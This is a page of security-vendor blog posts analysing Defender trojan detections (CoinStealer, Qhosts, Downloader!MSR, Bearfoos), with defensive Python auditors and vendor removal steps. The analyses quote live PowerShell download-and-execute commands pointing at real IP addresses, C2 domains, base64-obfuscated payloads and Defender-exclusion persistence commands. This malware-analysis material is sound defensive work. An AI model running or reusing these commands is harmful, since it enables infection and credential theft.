Trojan Archives – Gridinsoft Blog

Trojan:PowerShell/CoinStealer.RP!MTB
https://gridinsoft.com/blogs/trojan-powershell-coinstealer-rpmtb/
Thu, 29 Aug 2024 12:11:21 +0000

Trojan:PowerShell/CoinStealer.RP!MTB is a Microsoft Defender detection that normally flags malware capable of stealing cryptocurrency wallets. You may see it pop up after downloading a program from the Web or running a dodgy PowerShell script. More precisely, the malware collects credentials of different applications, and crypto wallets are among its primary targets. The stealthiness of this malware makes it hard to delete manually, so in this post, I will show you how to remove it.

Trojan:PowerShell/CoinStealer.RP!MTB Virus Detection Overview

The Trojan:PowerShell/CoinStealer.RP!MTB detection name corresponds to infostealer malware that targets crypto wallets among other things. The malware family it belongs to may vary, as the main reason for the detection – targeting crypto wallet credentials – is now a widespread feature of infostealers. The detection name also points clearly at this virus running commands in the PowerShell environment. This, in fact, complicates the analysis: the Microsoft Defender detection points at a genuine PowerShell instance.

CoinStealer.RP!MTB detection PowerShell

One less obvious thing about CoinStealer.RP!MTB is that it is a detection of a heuristic system. That is actually the reason why it carries no malware family identifier in the detection name. With this detection, Microsoft Defender effectively says “I have noticed fishy activity aimed at stealing login data for crypto wallets”. At the same time, it is hardly a false positive: while heuristics can produce false detections, there are no cases of CoinStealer being incorrect.

Aside from the said crypto wallet losses, the danger of this malware is losing access to your online accounts. At its core, the CoinStealer virus is an infostealer, hence it can target social media accounts and accounts of desktop apps. Several samples that I’ve analyzed were stealing Discord and Steam session tokens.

Spreading Ways

A PowerShell script is a rather common form for malicious programs, though it requires some specific spreading approaches. In particular, “useful scripts for Windows speed-up” or similar stuff that you may find online is what can carry this virus. And there’s more – fraudsters constantly seek new ways to make users execute the malware on their own.

For instance, they may use landing pages that appear after a redirect from another website, asking the user to download and run the script “to prove that you’re not a robot”. In some cases, an entire malicious script was posted as text, with the demand to copy it and paste it into PowerShell. Obviously, this ends up with nothing but malware injection. And this is what fits Trojan:PowerShell/CoinStealer.RP!MTB ideally.

Example of a malicious site that asks the user to run the code in PS

Technical Analysis

Now, let’s have a deeper look into how the malicious script functions. In fact, the PowerShell part is mostly about downloading the actual malware. PS scripts, although often abused by malware, are not well suited to accessing folders or extracting data. Still, a script is enough to download the virus and configure the networking so the malware has no problems with C2 communications. It also provides the malicious program with all the necessary privileges and anti-detection protection, so it runs unbothered.

One particular malware sample that uses PowerShell scripts for loading is Lumma Stealer. The script that eventually triggers the Trojan:PowerShell/CoinStealer.RP!MTB detection performs a rather simple operation: it connects to a remote server, downloads a file, and runs it from that exact location.

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://20.99.186.246:223/1.exe', 'C:\\Users\\%username%\\AppData\\Local\\erk3nfaib.exe');Start-Process 'C:\\Users\\%username%\\AppData\\Local\\erk3nfaib.exe'

Malware Execution

As I’ve opted for Lumma as the most prominent “user” of injection through PowerShell, I will analyze it further to show what it can do in the infected system. Following execution, it loads DLLs by abusing svchost.exe – a legitimate Windows process. The malware simply commands it to execute the library it needs:

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe -k DcomLaunch -p

This gives the malware not only the full set of libraries to run with but also the much-needed persistence. At this point, part of the CoinStealer virus files are running with system-level privileges, so antivirus programs will likely treat it as a safe process. Then it switches to the main course of the attack – collecting user data.

Data Collection

Although I’ve chosen a specific malware family to show off the capabilities of the malware that Trojan:PowerShell/CoinStealer.RP!MTB can deliver, the same list applies to pretty much any infostealer that can appear under this detection name. It goes through the folders of web browsers, collecting login credentials:

%localappdata%\\Google\\Chrome\\User Data
%localappdata%\\Chromium\\User Data
%localappdata%\\Microsoft\\Edge\\User Data
%localappdata%\\Kometa\\User Data
%localappdata%\\Opera Software\\Opera Stable
%localappdata%\\Opera Software\\Opera GX Stable

Data collection from the browser is followed by the expected collection of crypto wallet data. It searches for keywords in file and folder names (like “bitcoin” or “coinbase”) to locate the needed directory. Then it goes for the Important Files/Profile folders and dumps all the data from them. This allows cybercriminals to drain all the contents of these wallets.

Exfiltration & C2 Communications

The malware rarely employs unusual tactics when it comes to communications with the command server. It carries a pack of C2 addresses embedded in its own code and goes through this list trying to find an active one:

https://barebrilliancedkoso.shop/api
https://liabiliytshareodlkv.shop/api
https://notoriousdcellkw.shop/api

After establishing the connection, CoinStealer.RP!MTB sends the entire pack of data to the command server. Depending on the malware sample, it may be a plain text file or an archive with the extracted credentials sorted by source and type. But it almost always uses an encrypted connection, which defeats almost any attempt at packet analysis.

How to Remove Trojan:PowerShell/CoinStealer.RP!MTB?

To get rid of CoinStealer.RP!MTB, I recommend using GridinSoft Anti-Malware. Removing both the malicious script and the actual malware manually is not a trivial task, as they may hide pretty deep in the system. Also, as usually happens with modern malware, it creates several copies of itself on the disk, making manual removal even more complicated. GridinSoft Anti-Malware will do all this for you in just a few clicks.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Trojan:Win32/Qhosts
https://gridinsoft.com/blogs/trojan-win32-qhosts/
Mon, 05 Aug 2024 19:46:00 +0000

Trojan:Win32/Qhosts is malware that provides remote access to the target system and modifies the Hosts file. It is primarily distributed through illegal activation tools found on torrent and warez sites. While the mentioned interaction with the system configuration file is its defining feature, it is capable of much, much more unpleasant activities.

Trojan:Win32/Qhosts Overview

Trojan:Win32/Qhosts is a Microsoft Defender detection for dropper malware or remote-access trojans. Such malware is made to provide access to an infected system and deliver a payload. It is known for modifying the HOSTS system file, which is used to map hostnames to IP addresses. By doing so, it can provide itself with stable connectivity to the command server. In some cases, it does this to prevent the user from accessing antivirus vendors’ websites and getting security updates from Microsoft.

Trojan:Win32/Qhosts detection by Microsoft Defender

This malware is typically spread through dodgy software, like unauthorized activation tools, keygens and the like. Depending on the version, Trojan:Win32/Qhosts may block access to various services and sites, including those of Adobe and Microsoft. This partly explains its actions concerning the HOSTS file but does not account for its remote access capabilities. Sometimes, it also prevents antivirus software from accessing the Internet. This happens particularly often to software of renowned security vendors, whose server addresses are well-known.

Technical Analysis

Let’s get into the behavior analysis of Trojan:Win32/Qhosts using a specific instance as an example. In this case, it is a Windows activator, which has both its declared functionality and hidden malicious features. We’ll start with its launch, which is initiated by the user. Since this is an activator, its use implies that the anti-malware software on the system must be disabled. Despite this, the program performs standard checks for the presence of sandboxing/debugging or anti-malware software. It checks the following registry keys and file paths:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_LOCAL_MACHINE\System\Setup
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\
C:\Program Files (x86)\Windows Defender\MpClient.dll
C:\Program Files (x86)\Windows Defender\MpOAV.dll
C:\Program Files (x86)\Windows Defender\MsMpLics.dll
C:\Program Files\Windows Defender\MsMpLics.dll
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2102.4-0\X86\MpOav.dll

Delivering the Payload

The malware then drops files into the system’s temporary directory. Among these files are both the payload and the files necessary for Windows activation. Regarding the former, the files include:

C:\Users\user\AppData\Local\Temp\RarSFX0\Install.cmd
C:\Users\user\AppData\Local\Temp\RarSFX0\bin\bootsect.exe
C:\Users\user\AppData\Local\Temp\RarSFX0\bin\grldr

It also drops a large number of certificates into the folder C:\Users\user\AppData\Local\Temp\RarSFX0\certs.

Malicious Activity

Next, the malware creates several new processes from the temporary folder, then creates and runs additional executable files.

C:\Users\\AppData\Local\Temp\RarSFX0\MSG.exe
C:\Users\\AppData\Local\Temp\RarSFX0\VLD.exe

The malware then executes Visual Basic scripts (install.vbs) using cscript.exe:

cscript //nologo "C:\Users\\AppData\Local\Temp\RarSFX0\install.vbs"
cscript //nologo C:\Windows\system32\slmgr.vbs -ipk HERE-GOES-WINDOWS-ACTIVATION-KEY

As you might have guessed, this script installs a license key into the system. That is actually one of the dangers of this malware: the victim sees the system activation process and thinks everything is fine. But meanwhile, the malware does its dirty job in the background.

Gaining Persistence

The actions of the program do not end there; the malware continues with establishing persistence in the system. This specific sample appears to work as a dropper, so maintaining constant access to the system is crucial. To achieve this, it modifies settings in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows and other system-level keys to ensure it can survive reboots and maintain control over the system. Additionally, the malware manipulates the following keys:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.100\CheckSetting
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.101\CheckSetting
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102\CheckSetting

The first four keys are associated with checks performed by the Security and Maintenance feature in Windows. Each “CheckSetting” entry can correspond to a specific check such as firewall status, antivirus status, etc. This information also serves as part of system fingerprinting – an action that all malware performs to tell attacked systems apart.

Hosts File Manipulation

The malware then proceeds to manipulate the hosts file. To do this, it creates a specific registry key:

HKEY_CURRENT_USER\SOFTWARE\WinRAR SFX\C%%Windows%System32%drivers%etc

This key is associated with self-extracting WinRAR archives. Judging by the path, it is linked to a WinRAR operation affecting the hosts file. The malware drops a temporary file named __tmp_rar_sfx_access_check_34985937, which WinRAR creates during the extraction of a self-extracting archive (SFX). The filename indicates a temporary access check to ensure the program has sufficient rights to overwrite the hosts file in this directory. Subsequently, the malware replaces the Hosts file with the one it needs.

This could be done for several reasons:

  1. To prevent the system from contacting the license verification server, ensuring that the illegal activation remains in place.
  2. To block system or anti-malware updates.
  3. To redirect the user to fraudulent websites.
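As an added example (not code from the post or from GridinSoft), the Python below audits a hosts file for the three kinds of tampering just listed: a licensing or update domain sinkholed to a loopback or unspecified address, such a domain redirected elsewhere, and any other name pinned to an outside address. The watchlist of domains, the sample hosts file and the host names in it are constructed for this example.

```python
import ipaddress
from typing import Dict, List, Tuple

# Domains whose hosts-file entries deserve attention for the reasons listed above
# (license checks, OS and antivirus updates). The watchlist is an assumption made
# for this example, not a complete or vendor-maintained list.
WATCHLIST = ("microsoft.com", "windowsupdate.com", "adobe.com", "gridinsoft.com")
SINKHOLE_IPS = {"0.0.0.0", "127.0.0.1", "::1"}
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_hosts(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, address, hostname) for every active mapping."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        line = line.split("#", 1)[0].strip()      # drop comments and whitespace
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue                               # malformed line, maps nothing
        for host in fields[1:]:                    # one address may map several names
            entries.append((lineno, fields[0], host.lower()))
    return entries


def on_watchlist(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in WATCHLIST)


def is_external(addr) -> bool:
    """True for anything that is not loopback, unspecified, link-local or RFC1918."""
    if addr.is_loopback or addr.is_unspecified or addr.is_link_local:
        return False
    return not any(addr in net for net in RFC1918)


def audit_hosts(text: str) -> List[Dict[str, object]]:
    """Flag hosts entries matching the manipulation patterns described above."""
    findings = []
    for lineno, ip, host in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append({"line": lineno, "host": host, "ip": ip, "reason": "unparseable address"})
            continue
        if host == "localhost" and addr.is_loopback:
            continue                               # stock entries shipped with Windows
        if on_watchlist(host):
            sinkholed = ip in SINKHOLE_IPS or addr.is_loopback or addr.is_unspecified
            reason = ("update/licensing domain sinkholed" if sinkholed
                      else "update/licensing domain redirected")
            findings.append({"line": lineno, "host": host, "ip": ip, "reason": reason})
        elif is_external(addr):
            # any other name pinned to an outside address is how a victim gets
            # steered to a fraudulent site; worth a manual look
            findings.append({"line": lineno, "host": host, "ip": ip,
                             "reason": "hostname pinned to external address"})
    return findings


# Constructed hosts file for this example: the first two mappings are the stock
# Windows entries, the rest imitate a tampered file (documentation IPs only).
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         www.microsoft.com                # constructed: Microsoft blocked
127.0.0.1       download.windowsupdate.com       # constructed: updates blocked
0.0.0.0         licenses.adobe.com               # constructed: license check blocked
203.0.113.7     www.gridinsoft.com               # constructed: vendor site redirected
203.0.113.9     login.bank.example               # constructed: fraud redirect
192.168.1.20    fileserver.intranet              # constructed: private, legitimate
"""


def main() -> None:
    for f in audit_hosts(SAMPLE_HOSTS):
        print(f"line {f['line']}: {f['host']} -> {f['ip']}  [{f['reason']}]")


if __name__ == "__main__":
    main()
```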

How To Remove Trojan:Win32/Qhosts?

Removing Trojan:Win32/Qhosts involves several steps and requires an advanced anti-malware solution. GridinSoft Anti-Malware is the one you can rely on in this matter. First, you need to clean the system of malware. After cleaning the system, you need to restore the hosts file. Follow the instructions below for each of the steps.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Restore the Hosts File

  1. Go to the Tools tab and click Reset Browser Settings.

    Reset Browser Settings

  2. Uncheck all boxes except for the one next to the HOSTS file and click Reset.
    HOSTS Reset

By following these steps, your system will be fully restored and ready for use.

Trojan:Script/Downloader!MSR
https://gridinsoft.com/blogs/trojan-script-downloader-msr/
Wed, 17 Jul 2024 10:17:32 +0000

Trojan:Script/Downloader!MSR is a malicious script that downloads other malware onto the target system. It is most commonly spread through illegal software and fake documents, and is capable of deploying pretty much any malicious program. Due to its complexity and the use of obfuscation, the actual malicious script may remain undetected, while Defender will display a powershell.exe file as affected.

Trojan:Script/Downloader!MSR Overview

Trojan:Script/Downloader!MSR is a heuristic detection of Microsoft Defender that flags a small malware-downloading script. Unlike a full-fledged dropper, this malicious thing is in fact disposable: it never runs again after execution. This loader executes a selection of commands in PowerShell or Command Prompt, which triggers Microsoft Defender. But since this detection is heuristic, and the malicious activity comes from within the PS environment, the built-in antivirus reports powershell.exe as the file in question.

Trojan:Script/Downloader!MSR is typically spread through common malware methods such as game mods, pirated games, software, activators (KMS), and keygens. It is also distributed under the guise of legitimate files, masked with a double extension and an altered file icon. As for the payload, Trojan:Script/Downloader!MSR most often delivers spyware, remote administration tools, and ransomware.

Technical Analysis

Let’s get into Trojan:Script/Downloader!MSR operations on the target system by analysing the scripts this malware may use. By its nature, it does not perform any checks for the presence of a sandbox. Instead, it immediately does its job, which is dropping the payload:

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue' -ScriptBlock { (New-Object System.Net.WebClient).DownloadFile('http://5.252.161.59:8880/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' }

As we can see, the malicious script uses PowerShell to download and execute a malicious file. It employs the -ExecutionPolicy Bypass parameter to run the script without security restrictions. -NoExit keeps the console window open, i.e. it does not close once the command execution is over, so the script can execute other commands. It also uses -WindowStyle Hidden to hide the PowerShell window, so the user does not notice its execution. Finally, Start-Process 'C:\\test-MDATP-test\\invoice.exe' executes the downloaded file.

Basic Code Obfuscation

Although this is a fairly primitive loader script, some obfuscation may be used to make detection harder. Below, you can see one of the intermediary commands that the script can execute to add a specific registry key. This key may later serve as a foothold for the malware the script deploys, for gaining persistence or storing valuable data.

reg.exe add "HKEY_CURRENT_USER\Software\Classes\AppProgram" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

This way, the malware adds a new registry key and sets its value to a base64-encoded string. A base64-encoded PowerShell command looks like this:

powershell.exe -e #{JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==}

Even though the malware’s encoding can be reversed, the obfuscation still makes it harder to detect.
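As an added example (not code from this post, the CoinStealer post, or GridinSoft), the Python below triages a PowerShell command line for the parameters discussed above and decodes both base64 forms shown: the ASCII payload stored via reg add and the UTF-16LE -e argument. The indicator names and regexes are this example's own assumptions; the reg add, iex and encoded-command lines are quoted from this post, while the download one-liner is a constructed copy of the shape shown above using a documentation IP.

```python
import base64
import re
from typing import List, Optional

# Indicators a defender looks for in a PowerShell command line. The names and
# patterns are this example's own assumptions, not a vendor signature set.
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-Exec(?:utionPolicy)?\s+Bypass", re.I),
    "hidden_window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
    "download_cradle": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b", re.I),
    "run_from_user_dir": re.compile(r"Start-Process\s+'[^']*\\+(?:AppData|Temp|Users)\\+", re.I),
    "invoke_expression": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "base64_from_registry": re.compile(r"FromBase64String", re.I),
}
# -e / -enc / -EncodedCommand <base64>; tolerates the #{...} wrapper seen above
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+#?\{?([A-Za-z0-9+/=]{16,})", re.I)
# reg.exe add ... /d "<base64>" (the payload stored for a later iex)
REG_B64_VALUE = re.compile(r'/d\s+"([A-Za-z0-9+/=]{16,})"')
# "Wr"+"it"+"e-Host" style string splitting
STRING_CONCAT = re.compile(r'"\s*\+\s*"')


def _b64(data: str) -> bytes:
    """Decode base64, tolerating stripped padding."""
    return base64.b64decode(data + "=" * (-len(data) % 4))


def triage(cmd: str) -> List[str]:
    """Return the names of the indicators that fire on one command line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    # download followed by execution is the download cradle proper
    if "download_cradle" in hits and re.search(r"Start-Process|\bsaps\b", cmd, re.I):
        hits.append("download_and_execute")
    if ENCODED_ARG.search(cmd):
        hits.append("encoded_command")
    return hits


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Decode an -EncodedCommand argument: base64 over UTF-16LE text."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return None
    raw = _b64(m.group(1))
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("latin-1")   # not UTF-16 after all; show the raw bytes


def decode_registry_payload(cmd: str) -> Optional[str]:
    """Decode the base64 value that a 'reg add /d' command stores for a later iex."""
    m = REG_B64_VALUE.search(cmd)
    if not m:
        return None
    return _b64(m.group(1)).decode("utf-8", errors="replace")


def collapse_string_concat(script: str) -> str:
    """Join "a"+"b" fragments so the real cmdlet name becomes readable."""
    return STRING_CONCAT.sub("", script)


# Constructed copy of the download one-liner shown above (documentation IP, made-up user name).
DOWNLOAD_CMD = (
    r"powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden "
    r"$ErrorActionPreference = 'silentlycontinue';"
    r"(New-Object System.Net.WebClient).DownloadFile('http://203.0.113.10/1.exe', "
    r"'C:\Users\victim\AppData\Local\erk3nfaib.exe');"
    r"Start-Process 'C:\Users\victim\AppData\Local\erk3nfaib.exe'"
)
# The following three are quoted from the post.
REG_ADD_CMD = (
    r'reg.exe add "HKEY_CURRENT_USER\Software\Classes\AppProgram" /v ART /t REG_SZ /d '
    r'"U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f'
)
IEX_CMD = r"iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))"
ENCODED_CMD = (
    "powershell.exe -e #{JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBl"
    "AC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==}"
)
BENIGN_CMD = r"powershell.exe -NoProfile -Command Get-Process | Sort-Object CPU"   # constructed


def main() -> None:
    for cmd in (DOWNLOAD_CMD, REG_ADD_CMD, IEX_CMD, ENCODED_CMD, BENIGN_CMD):
        print(cmd[:60], "->", triage(cmd) or "no indicators")
    print("registry payload:", decode_registry_payload(REG_ADD_CMD))
    print("encoded command :", collapse_string_concat(decode_encoded_command(ENCODED_CMD)))


if __name__ == "__main__":
    main()
```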

Is Trojan:Script/Downloader!MSR a False Positive?

Sometimes, Trojan:Script/Downloader!MSR can be detected by antivirus software as a false positive. This mostly occurs when a program lacks a valid certificate and accesses the internet. In some cases, detection happens when the program contacts suspicious IP addresses. Regardless, it is always essential to check such detections to rule out any real threats.

For these purposes, I recommend using GridinSoft Anti-Malware. In addition to scanning and cleaning your system, it provides proactive device protection and Internet Security, which will prevent threats even at the download stage.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Trojan:Win32/Bearfoos.B!ml
https://gridinsoft.com/blogs/trojan-win32-bearfoos-bml/
Sat, 13 Jul 2024 12:31:59 +0000

Trojan:Win32/Bearfoos.B!ml is a Microsoft Defender detection associated with data-stealing malware. It may flag this malware due to specific behavior patterns, assigning that name even to malicious programs of well-known families. As Defender uses machine learning for this detection, it can sometimes be a false positive.

Trojan:Win32/Bearfoos.B!ml Overview

Trojan:Win32/Bearfoos.B!ml is a detection by Microsoft Defender’s AI system for infostealer malware and spyware. Typically, the malware this detection flags belongs to a broader family, but it may also be a small-batch virus. The reason for the detection is a specific behavior pattern that the AI system has spotted, which means it is not really clear what exactly caused it. Bearfoos embeds itself deeply into the system, often unnoticed by the user. It targets cookies, password databases, cryptocurrency wallets, and other sensitive information stored on the infected system.

Trojan:Win32/Bearfoos.B!ml detection

Once the data is collected, the malware transmits it to a command-and-control server, then enters a dormant state, waiting for further commands. This allows it to remain undetected for extended periods. In addition to data theft, Bearfoos can log keystrokes, take screenshots, record video or audio using the system’s peripherals, and perform other spying activities.

Trojan:Win32/Bearfoos.B!ml spreads using methods typical for this type of malware. Most commonly, it is distributed through game cheats, mods, and dubious utilities. The second most common method of distribution is email spam.

Technical Analysis

Let’s break down how Trojan:Win32/Bearfoos.B!ml behaves in an infected system. The particular sample that I review appears to be an offshoot of AgentTesla spyware. I’ll try to explain the most important aspects of this threat as clearly as possible.

Upon infiltrating the system, the malware checks the following locations for the presence of sandboxes and debuggers. This is a typical step that malware takes to avoid analysis and “useless” infections.

C:\drivers\etc\hosts
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\system32\VERSION.dll

Gaining Persistence

After that, it drops a copy of itself into the AppData/Roaming folder under a random name. In my case, it was vzCravLx.exe. Next, the malware checks Microsoft Defender settings:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus

These registry values pertain to various components of the system’s anti-malware protection settings. The malware checks them to understand the system’s security posture and plan further actions. In our scenario, where the Defender settings were at their defaults, Bearfoos proceeded to alter Defender. It executes the following commands:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\\AppData\Roaming\vzCravLx.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vzCravLx" /XML "C:\Users\\AppData\Local\Temp\tmp6EAE.tmp

This is what provides persistence to the malware. With the first command, it excludes the path to its own executable from Microsoft Defender scanning. The second command creates a task in Task Scheduler to run the malware periodically. After that, Bearfoos a.k.a. AgentTesla deletes the original file and keeps operating only through these protected duplicates.
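As an added example (not code from the post or from GridinSoft), the Python below audits the two persistence artifacts just described, a Defender exclusion list and a Task Scheduler XML definition, and reports the combination this sample relies on. The exclusion list, the task XML, the user name and the set of user-writable path fragments are constructed for this example; the task path and executable name follow the sample above.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a standard user can write to. A Defender exclusion or a task action
# pointing here is the pattern this sample shows (AppData\Roaming). Which
# fragments count as user-writable is this example's own assumption.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Downloads|Public|ProgramData)\\", re.I)


def suspicious_exclusions(exclusion_paths: List[str]) -> List[str]:
    """Exclusions that point into user-writable directories."""
    return [p for p in exclusion_paths if USER_WRITABLE.search(p)]


def audit_task_xml(xml_text: str) -> Dict[str, object]:
    """Pull the persistence-relevant facts out of a Task Scheduler XML definition."""
    root = ET.fromstring(xml_text)
    exec_cmds = [
        (node.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip()
        for node in root.findall(".//t:Actions/t:Exec", TASK_NS)
    ]
    interval = root.findtext(".//t:Repetition/t:Interval", namespaces=TASK_NS)
    hidden = (root.findtext(".//t:Settings/t:Hidden", default="false", namespaces=TASK_NS) or "")
    return {
        "uri": (root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=TASK_NS) or "").strip(),
        "exec_in_user_writable": [c for c in exec_cmds if USER_WRITABLE.search(c)],
        "logon_trigger": root.find(".//t:LogonTrigger", TASK_NS) is not None,
        "repeat_interval": interval.strip() if interval else None,   # ISO 8601 duration, e.g. PT1M
        "hidden": hidden.strip().lower() == "true",
    }


def persistence_findings(exclusion_paths: List[str], task_xml: str) -> List[str]:
    """Correlate both artifacts into a list of human-readable reasons for concern."""
    reasons = []
    bad = suspicious_exclusions(exclusion_paths)
    if bad:
        reasons.append(f"Defender exclusion in user-writable path: {bad}")
    task = audit_task_xml(task_xml)
    if task["exec_in_user_writable"]:
        reasons.append(f"task {task['uri']} runs a user-writable executable: {task['exec_in_user_writable']}")
    if task["logon_trigger"] or task["repeat_interval"]:
        reasons.append(f"task re-launches on logon={task['logon_trigger']}, every {task['repeat_interval']}")
    if task["hidden"]:
        reasons.append("task is marked hidden")
    return reasons


# Constructed exclusion list, in the shape Get-MpPreference reports ExclusionPath.
SAMPLE_EXCLUSIONS = [
    r"C:\Users\victim\AppData\Roaming\vzCravLx.exe",   # what the sample above added
    r"C:\Program Files\ExampleVendor\scanner.exe",     # constructed: a typical admin exclusion
]

# Constructed task definition in the shape of a Task Scheduler export (real exports
# carry a UTF-16 XML declaration, omitted here so the string parses as-is).
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Updates\vzCravLx</URI></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <TimeTrigger>
      <Repetition><Interval>PT1M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2024-07-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Settings><Hidden>true</Hidden><Enabled>true</Enabled></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\Users\victim\AppData\Roaming\vzCravLx.exe</Command></Exec>
  </Actions>
</Task>"""


def main() -> None:
    for reason in persistence_findings(SAMPLE_EXCLUSIONS, SAMPLE_TASK_XML):
        print("-", reason)


if __name__ == "__main__":
    main()
```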

Data Collection

